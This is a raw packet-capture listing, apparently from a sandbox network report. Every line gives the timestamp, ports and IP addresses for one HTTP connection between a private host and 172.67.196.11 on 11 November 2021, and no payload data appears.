Nov 11, 2021 20:35:49.051881075 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051915884 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051950932 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.051959038 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.051970005 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052014112 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052047968 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052093983 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052139044 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052144051 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.052184105 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052215099 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052267075 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052298069 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052350998 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052382946 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052438021 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052469969 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052495956 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.052529097 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052562952 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052586079 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.052618980 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052656889 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.052659988 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052706003 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052740097 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052792072 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052824020 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052884102 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.052911043 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.052942038 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053000927 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053035021 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053062916 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.053090096 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053122997 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053175926 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053231001 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053262949 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053308964 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.053314924 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053356886 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053375959 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.053405046 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053442955 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053497076 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053531885 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053554058 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.053577900 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053611040 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053668022 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053705931 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.053705931 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053750038 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053782940 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053837061 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.053838968 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053858042 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.053862095 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.053881884 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053920031 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.053942919 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.053977966 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054012060 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054059029 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054090023 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054143906 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054177046 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054228067 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054275036 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.054275036 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054322004 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054363966 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054421902 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054450989 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.054465055 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054498911 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054522038 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.054541111 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054569006 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054616928 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054626942 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.054649115 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054689884 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054718971 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054740906 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.054747105 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.054759026 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054788113 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054837942 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054866076 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054913998 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.054928064 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.054956913 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055002928 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055036068 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055078983 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055095911 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.055119038 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055157900 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055187941 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055236101 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055250883 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.055268049 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055308104 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055337906 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055387020 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055396080 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.055418968 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055453062 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055500984 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055531979 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055578947 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055612087 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055664062 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055670977 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.055699110 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055725098 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.055742025 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055780888 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055809021 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055856943 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055886984 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055933952 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.055948019 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.055963039 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056006908 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056036949 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056082964 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056092978 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.056117058 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056149006 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056200027 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056236029 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.056241035 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056279898 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056318998 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056358099 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056405067 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056432962 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056480885 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056510925 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056554079 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.056560040 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056562901 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.056587934 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056634903 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056670904 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056700945 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056750059 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056777000 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056823969 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056873083 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056921005 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.056922913 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056926012 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.056962967 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.056993961 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.057039976 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.057068110 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.057115078 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.057143927 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.057192087 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.057220936 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.057260990 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.057266951 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.057266951 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.057296038 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.057329893 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.057769060 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.057971001 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.059322119 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.059365034 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.059396029 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.059437037 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.059468031 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.059515953 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.059545040 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.059571028 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.059595108 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.059634924 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.059667110 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.059691906 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.059709072 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.059741974 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.059746981 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.059804916 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.074206114 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074232101 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074271917 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074300051 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074332952 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074347019 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.074358940 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074393988 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074423075 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.074428082 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.074431896 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.074431896 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074470043 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074475050 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.074496984 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074525118 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074562073 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074594021 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074616909 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074656010 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074687004 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074707985 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074747086 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074768066 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074805975 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074826956 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074865103 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074886084 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074924946 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074948072 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.074984074 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075000048 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.075007915 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.075011015 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.075014114 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.075016022 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075016975 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.075020075 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.075042009 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075072050 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075086117 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.075100899 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075124025 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075160027 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075190067 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075211048 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075242996 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.075247049 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075249910 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.075272083 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075308084 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075330973 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075367928 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075392008 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075429916 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075453043 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075486898 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.075488091 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075495958 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.075514078 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075541019 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075586081 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075606108 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.075612068 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.075623989 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075661898 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075695038 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.075697899 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075743914 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075774908 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075824022 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075855017 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075879097 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.075885057 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.075902939 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075946093 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.075995922 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.076001883 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076033115 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076081038 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076109886 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076149940 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.076159000 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.076159000 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076200008 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076230049 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076280117 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076287985 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.076313019 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076369047 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076397896 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076443911 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076452017 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.076478958 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076522112 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076550007 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.076555967 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.076559067 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076591969 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076641083 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076647043 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.076673985 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076683044 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.076714993 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076746941 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076776028 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.076792955 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076822996 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076831102 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.076873064 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.076900959 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076915026 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.076950073 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.076989889 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077043056 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077073097 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077126980 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077166080 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077209949 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.077215910 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077219963 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.077255011 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077286005 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077337027 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077364922 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077410936 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.077419996 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077452898 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077506065 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077550888 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077579021 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077620983 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.077630043 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.077630997 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077662945 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077716112 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077752113 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077794075 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.077801943 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077848911 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077899933 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077929974 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.077974081 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.077980042 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078010082 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078057051 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078088999 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078144073 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078172922 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078212976 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.078218937 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.078226089 CET	80	49751	172.67.196.11	192.168.2.3
